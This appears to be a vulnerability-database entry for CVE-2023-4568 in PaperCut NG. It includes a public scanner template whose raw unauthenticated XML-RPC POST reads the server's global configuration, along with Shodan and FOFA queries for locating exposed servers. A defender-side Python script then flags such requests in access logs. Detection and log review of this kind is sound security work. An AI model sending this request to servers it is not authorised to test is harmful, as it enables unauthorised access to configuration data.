CVE-2023-4568: PaperCut NG Unauthenticated XMLRPC Functionality

Date: 2025-08-01 | Affected software: PaperCut NG | PoC: Public

Vulnerability Description

PaperCut NG allows unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to the lack of a vendor-supplied patch.

PoC Code [Public]

id: CVE-2023-4568

info:
  name: PaperCut NG Unauthenticated XMLRPC Functionality
  author: DhiyaneshDK
  severity: medium
  description: |
    PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.
  impact: |
    Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-4568
    - https://www.tenable.com/security/research/tra-2023-31
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-4568
    cwe-id: CWE-287
    epss-score: 0.83198
    epss-percentile: 0.99222
    cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: papercut
    product: papercut_ng
    shodan-query:
      - html:"content=\"PaperCut\""
      - http.html:'content="papercut'
      - cpe:"cpe:2.3:a:papercut:papercut_ng"
      - http.html:"content=\"papercut\""
    fofa-query:
      - body='content="papercut'
      - body="content=\"papercut\""
    google-query: html:'content="papercut'
  tags: cve2023,cve,unauth,papercut

http:
  - raw:
      - |
        POST /rpc/clients/xmlrpc HTTP/1.1
        Host: {{Hostname}}
        Content-Type:text/xml

        <?xml version="1.0"?><methodCall><methodName>client.getGlobalConfig</methodName><params><param><value><string>str1</string></value></param><param><value><string>str2</string></value></param></params></methodCall>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'conf.ssl-port'
          - 'conf.auth-ttl-default'
        condition: and

      - type: word
        part: header
        words:
          - text/xml

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ea30e55bedf6a0d16be86114b6e23f4163f753126b73d8afa7eded52e286791202203e4907db8970571bfbb8bbbee6c31dd3e4e00ba851f8f5c9c85ebfb432c6be66:922c64590222798bb761d5b6d8e72950
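
A defender-side companion to the check above, added here as an example that is not part of the original template or of PaperCut: it scans access logs for POSTs to /rpc/clients/xmlrpc that returned 200 to a source outside an allowlisted client network. The combined log format (for example from a reverse proxy in front of the server), the TRUSTED_NETS range and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: access logs are in combined format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
RPC_PATH = "/rpc/clients/xmlrpc"  # endpoint requested by the template above

# Assumption: the only network where legitimate PaperCut clients live.
TRUSTED_NETS = [ipaddress.ip_network("10.20.0.0/16")]

def is_trusted(ip):
    """True if ip parses and falls inside one of TRUSTED_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # hostnames or garbage are treated as untrusted
    return any(addr in net for net in TRUSTED_NETS)

def find_untrusted_xmlrpc(lines):
    """Return (ip, timestamp, status) for successful XML-RPC POSTs from outside TRUSTED_NETS."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        path = m["path"].split("?", 1)[0].rstrip("/")
        if m["method"] != "POST" or path != RPC_PATH:
            continue
        if m["status"] == "200" and not is_trusted(m["ip"]):
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE = [
    '10.20.4.17 - - [01/Aug/2025:09:12:01 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.45 - - [01/Aug/2025:09:13:44 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 4987 "-" "-"',
    '203.0.113.45 - - [01/Aug/2025:09:13:50 +0000] "GET /app HTTP/1.1" 200 812 "-" "-"',
    '198.51.100.9 - - [01/Aug/2025:09:15:02 +0000] "POST /rpc/clients/xmlrpc HTTP/1.1" 403 0 "-" "-"',
]

if __name__ == "__main__":
    for ip, ts, status in find_untrusted_xmlrpc(SAMPLE):
        print(f"unauthenticated XML-RPC access from {ip} at {ts} (HTTP {status})")
```

A 403 on the same path, as in the last sample line, indicates the endpoint is already restricted for that source and is not reported.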
